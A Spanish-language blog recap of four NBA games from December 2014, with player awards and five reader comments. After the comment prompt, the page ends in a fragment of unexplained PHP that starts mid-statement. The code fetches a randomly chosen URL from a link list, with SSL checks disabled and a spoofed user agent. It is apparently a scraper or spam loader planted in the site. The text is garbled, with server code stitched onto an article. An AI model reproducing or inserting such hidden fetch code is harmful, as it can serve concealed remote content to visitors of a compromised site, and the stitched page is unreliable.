La crónica: Abran paso

02 de December de 2014 por MagicJohnson32

Hagan paso, que llegan los Wizards. Washington ya acecha a los Raptors en lo alto de la Conferencia Este tras aplastar a Miami en una madrugada que acerca a estos tristes Sixers a los libros de historia y confirma la mejoría de Clippers y Nuggets.

Os contamos lo que dio de sí la jornada.

wall_heat

Miami Heat 86 – Washington Wizards 107

Si algún aliciente presentaba la pasada madrugada era el enfrentamiento entre una de las fuerzas emergentes del Este, los Wizards, y el ganador de los últimos cuatro títulos de la conferencia, los Heat. Con John Wall al mando de las operaciones, la superioridad de Washington fue tal que el partido estaba prácticamente sentenciado al descanso. La segunda mitad solo sirvió para refrendar la superioridad de los de la capital en todos los frentes, desde el tiro exterior (10 de 19 en triples de Wizards por 2 de 22 Miami), hasta el rebote (42 por 33). Incluso el banquillo le funcionó como un reloj a Wittman, que tuvo en Rasual Butler al máximo anotador del partido. Por parte de los Heat, la mejor noticia es que Wade participó sin problemas en la segunda noche de un back to back, y de hecho fue, junto a Bosh, de lo poco salvable de su equipo.

Denver Nuggets 103 – Utah Jazz 101

Y así, en cuestión de un par de semanas, los Nuggets no solo han dejado atrás lo que apuntaba a crisis galopante sino que se sitúan a orillas de las posiciones de Playoffs del Oeste. Anoche vencieron en una cancha siempre complicada, el EnergySolutions de Salt Lake City, en un encuentro que parecían tener dominado hasta el tramo final del tercer cuarto con una renta que alcanzó los 22 puntos. Pero los Jazz, incluso esta generación de jovenzuelos, no son de rendirse, y un parcial de 8-26 empató el partido cuando todavía restaban 10 minutos por disputarse. No se hundieron los Nuggets, que volvieron a abrir brecha antes de que Afflalo fuese expulsado por una durísima falta sobre Burks y, ya con menos de un minuto por delante, Hayward empató a 99. Finalmente fue Lawson, con una afortunada pero muy meritoria canasta, el que decantó la balanza. Los intentos de Hayward y Burke no entraron y Denver eleva a 7-0 su marca cuando deja a su rival en 101 puntos o menos.

San Antonio Spurs 109 – Philadelphia 76ers 103

Los Spurs no tenían a Duncan ni Parker. Los Sixers no tenían a Wroten ni Noel. Había que tener muchas ganas para ver el partido, pero Kawhi Leonard hizo todo lo posible para que valiese la pena. El alero se puso el disfraz que ya vistió en las pasadas Finales para liderar la cómoda victoria de los texanos en Phily, con MCW y Alexey Shved como mejores jugadores locales. El resultado convierte a los Sixers en el cuarto equipo de la historia en empezar una temporada con 17 derrotas. El récord está al alcance del equipo dirigido por Brett Brown: el miércoles empatarían la peor marca en caso de perder en Minnesota y el viernes se harían con el dudoso honor si caen en casa frente a los Thunder.

Minnesota Timberwolves 101 – L.A. Clippers 127

Otro equipo que ha espantado las dudas que le invadían en el inicio de curso son los Clippers. Su excelente gira -la mejor en la historia de la franquicia- le ha impulsado ya a la séptima posición del Oeste y anoche ni se despeinaron para despachar a unos Wolves sin Ricky Rubio, Pekovic y Kevin Martin. JJ Redick, especialmente afinado, fue autor de dos acciones de 3+1 y Blake  Griffin hizo estragos en apenas 25 minutos, por lo que Doc Rivers pudo dar descanso a sus titulares y dar cuerda a un banquillo que necesita minutos y confianza, algo que anoche agradecieron gente como Hawes y Farmar. También hizo lo propio Flip Saunders, cosa que aprovechó Muhammad para brillar de nuevo.

PREMIOS

MVP: En el podium figuran Lawson (15 puntos, 12 asistencias, 4 rebotes, 2 robos y la canasta ganadora), John Wall (18 puntos, 13 asistencias y 5 rebotes) y Griffin (que solo necesitó 25 minutos necesitó para acumular 23 puntos, 8 rebotes y 3 asistencias), pero el premio es para Kawhi Leonard, con 26 puntos, 10 rebotes, 4 asistencias y 2 robos en ausencia de Duncan y Parker.

Rookie: El 6-2-2 de Napier y los 14 puntos de Wiggins no pueden con los 10 puntos, 9 rebotes, 2 asistencias, 3 robos y 2 tapones de uno de nuestros novatos favoritos, KJ McDaniels.

Sorpresa: Un trotamundos como Rasual Butler fue, con 23 puntos, el máximo anotador de un partido en el que participaban Wall, Wade, Bosh, Beal o Gortat. Si eso no es una sorpresa… También fue un día especialmente productivo por parte de Shved, autor de 19 puntos, 4 rebotes, 4 asistencias y 2 robos ante los campeones, y de Shabazz Muhammad, con 18 puntos, 10 rebotes y 4 asistencias.

Decepción: Ante las bajas que acumulan los Wolves, uno esperaría más de Thaddeus Young, que volvió a decepcionar con 8 puntos y poco más. Aunque si algo no alcanzó nuestras expectativas anoche fue la actuación de los Heat, personificada en Luol Deng (2 de 7 en tiros, 9 puntos y 3 rebotes).

Mayor esfuerzo en vano: Wade & Bosh anotaron 41 de los 86 puntos de los Heat y, además, con excelentes porcentajes (18 de 27 entre ambos). Hayward, Burke, Burks & Kanter sumaron 82 puntos. Y Michael Carter-Williams hizo los numerazos de costumbre con 24 puntos, 11 rebotes y 7 asistencias.

Top 5

Imágenes | AP Photos / Getty Images

Comenta

5 comentarios a esta entrada

  1. Azabel dice:
    #1

    juegazo de los 76ers frente a los Wolves, los dos peores equipos al dia de hoy de la liga? o ganan ese juego, o luego el partido contra el Thunder se llevan otro premio

    lo peor de todo con Phily es que no tienen lesionados que puedan volver en unos partidos, asi que no se como lograran ganar juegos,
    si pudiera, haria un par de trade para levantar un poco al equipo, lo que estan haciendo no es tanking, es sencillamente vergonzozo

      Citar

  2. Ruxixón dice:
    #2

    Vaya fotaza habeís elegido para ilustrar la crónica.Habla por si sola y refleja ese paso adelante en la madurez de Wall,ya marcando el tempo de los partidos.Para Miami una buena señal de lo que podría ser tranquilamente una eliminatoria de PO y esa carencia de juego interior en los Heat…

      Citar

  3. Azabel dice:
    #3

    Ruxixón: Para Miami una buena señal de lo que podría ser tranquilamente una eliminatoria de PO y esa carencia de juego interior en los Heat…

    Soy el unico que ve a OKAFOR como un refuerzo clave para el Heat? es cierto que vien de una temporada en blanco, pero tambien venia de estar parado en New Orleans y respondio con un temporadon en los Wizards hace dos años

    ese tamañao, esa defensa y esa intimidacion no se pierden, pedazo de refuerzo para quien lo tome, el Heat debria ser el principal interesado

      Citar

  4. Azabel dice:
    #4

    o sino, a Riley que le gusta revivir jugadores, por que no hace un intento con Bynum?

      Citar

  5. MagicJohnson32 dice:
    #5

    Ruxixón:
    Vaya fotaza habeís elegido para ilustrar la crónica.Habla por si sola y refleja ese paso adelante en la madurez de Wall,ya marcando el tempo de los partidos.Para Miami una buena señal de lo que podría ser tranquilamente una eliminatoria de PO y esa carencia de juego interior en los Heat…

    De hecho, no sabía cómo titular la crónica hasta que he visto esa foto. No es que sea perfecta para ilustrar el “Abran paso”, es que este caso el tituar es casi un pie de foto.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>